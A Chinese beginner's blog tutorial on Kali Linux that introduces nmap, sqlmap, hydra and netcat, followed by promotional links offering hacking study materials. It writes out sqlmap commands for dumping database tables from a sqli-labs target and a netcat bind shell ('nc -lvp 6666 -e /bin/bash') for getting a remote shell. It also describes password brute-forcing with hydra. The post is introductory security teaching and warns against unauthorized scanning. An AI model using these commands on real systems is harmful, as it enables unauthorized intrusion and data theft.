最新kali linux入门及常用简单工具从零基础入门到精通,看完这一篇就够了

387 篇文章 2 订阅
58 篇文章 0 订阅

相信很多同学了解到和学习网络安全的时候都听过kali系统大家都称之为黑客最喜爱的系统那么什么是kali初学者用kali能做些什么大白我将在本文中做详细的介绍

一、kali linux是什么

Kali Linux 是专门用于渗透测试的Linux操作系统它由BackTrack发展而来。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用Live Linux后,BackTrack正式改名为Kali LInux。

  没错kali的本质也是linux系统;就好比以前的黑客经常使用一些工具久而久之的大家就共同开源了一个集成了各种黑客工具系统。至于为什么黑客都喜欢使用kali主要是在kali中工具齐全避免了在需要使用的时候发现工具需要再下载安装的麻烦

在这里插入图片描述

二、安装下载kali

kali的官网地址https://www.kali.org

目前kali仍然在保持着更新目前最新的kali系统为kali purple里面继承了更多的防守方使用的工具。

下载解压后用vm打开即可默认root账号密码均为kali&kali。没有用过VMware的同学可以先到网上学习如何下载vm。

 另外新手可能会遇到虚拟机没有网络的问题新手我这里推荐配置网卡时选择直接连接等之后了解到网卡网段的知识可以再自己配置想要的网卡信息。左上角虚拟机设置网络适配器桥接模式复制物理网络连接状态

三、kali常见工具介绍

在这里插入图片描述

正如刚才所说kali里集成了大量的黑客工具和网络安全相关工具可以说黑客需要做的所有事情在这个系统中都有工具可以实现。下面我推荐几个新手入门可以用到的小工具。

1.nmap

nmap被称为诸神之眼是一款非常强大的网络探测工具可以实现主机发现和端口扫描同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描

nmap最基础用法

nmap \[目的ip\]\`\`nmap 192.168.1.10\`\` \`\`nmap \[目的网段\]\`\`nmap 192.168.1.0/24

在这里插入图片描述

map也提供了大量的扫描时候可以设置的参数下面将举例常用的参数

在这里插入图片描述

在这里插入图片描述

添加参数可以显示出不同的扫描结果

2.sqlmap

sqlmap是针对sql注入漏洞的一款自动化sql注入探测工具支持多种操作系统环境和多种数据库的漏洞探测;渗透测试人员常常调侃“没有什么操作技术就是sqlmap一把梭哈屏幕显示绿了就直接下班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

大家尽量不要在未授权的情况下去对公网资产进行批量扫描小心去踩缝纫机哦

下面我以sqli-lab里面的靶场为例

在这里插入图片描述

出现图中绿色信息说明sqlmap对该参数成功注入注意我的url中在最后以GET方式输入了参数id/?id&如果不给sqlmap提供参数sqlmap是无法使用的哦

找到注入点后的步骤基本是确定的

 \`sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --dbs #获取当前数据库服务所开启的数据库名称\` \`sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 --tables #获取某数据库下的所有表名\` \`sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段\`\`sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" -D 数据库名 -T 表名 -C 字段名 --dump #将该字段的内容全部获取出来并存储,在最后的信息中会有存储路径信息\`

第一步获取数据库

在这里插入图片描述

第二步获取数据库下表名

在这里插入图片描述

第三步获取该表字段其实到表名这一步可以直接–dump获取表里所有内容

在这里插入图片描述

所以sqlmap的使用难处在于如何找到注入点也就是找到产生sql注入的参数在例子里参数是GET方式上传的“id”参数下面提供一些sqlmap常用的参数

在这里插入图片描述

3.hydra

hydra又称九头蛇是一款非常高效的多种协议都可以使用的爆破工具对指定ip的指定服务进行爆破需要输入爆破使用的字典或者自己指定爆破使用的数据比如在已知账号为admin时爆破密码

在kali中hydra有图形化和命令行两种使用方式

在这里插入图片描述

对于新手来说图形化界面更加简易好用下面介绍图形化使用

在这里插入图片描述

在这里插入图片描述

之后选择start就好了hydra会使用字典中的所有账号密码去做登陆的爆破尝试

4.netcat

netcat简称nc;是一款目前最常用网络工具它提供基于socket协议套接字针对TCPUDP连接的网络使用在具有nc使用权时几乎可以建立任何类型的连接通常在渗透测试中用该工具获得目的ip的shell

nc简单使用方式建立连接传输信息

主机1开启对6666端口的监听

nc -lvp 6666

参数解释:

在这里插入图片描述

主机连接主机1的6666端口

nc 192.168.0.163 6666

在这里插入图片描述

nc常用使用获取远程主机shell

1.正向连接shell

主机1

nc -lvp 6666 -e /bin/bash

参数解释

这里将主机1的/bin/bash重定向到了自己主机的6666端口

主机2

nc 192.168.0.163 6666

在这里插入图片描述

大家可以思考一下为什么左边会有下面的报错呢并且在执行sudo su尝试进入root权限时必须在左侧主机输入密码才可以进入进入后才会收到来自右侧发来的密码kali并且产生报错。可以尝试了解不同终端bash/zsh/sh的

其实在手机上也可以安装kali,1、手机安装kali可以进行主机渗透,还可以进行密码破解。
2、kali是一个基于Debian的Linux发行版。它的目标就是为了简单。在一个实用的工具包里尽可能多的包含渗透和审计工具。kali并不要求你自己去维护一个Linux系统,或者你自己去收集软件和依赖项。它是一个“交钥匙工程”。所有这些繁杂的工作都不需要用户去考虑,因此,用户只需要专注于要审计的真实工作上,而不需要去考虑准备测试系统。
3、kali是一个安全工具。kali像NMap和Wireskark这样的经典信息采集工具。kali还有面向wifi的工具,也有破解密码的工具。kali并不是为普通用户准备的,而是一个“黑客操作系统“。kali被设计为以root权限运行。它自身并不安全,并且它的配置也与普通的Linux发行版不一样。它是一个攻击型工具,而不是一个防御型工具。
4、kaliLinux是许多优秀的安全工具的集合。kali对于一个专业用户来说,它是一个极好的工具。它有一些优秀的开发工具,用于去实时审计它们的应用程序。如果使用kaliLinux,用户将运行一个缺乏安全保障的系统。

题外话

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

  • 15
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值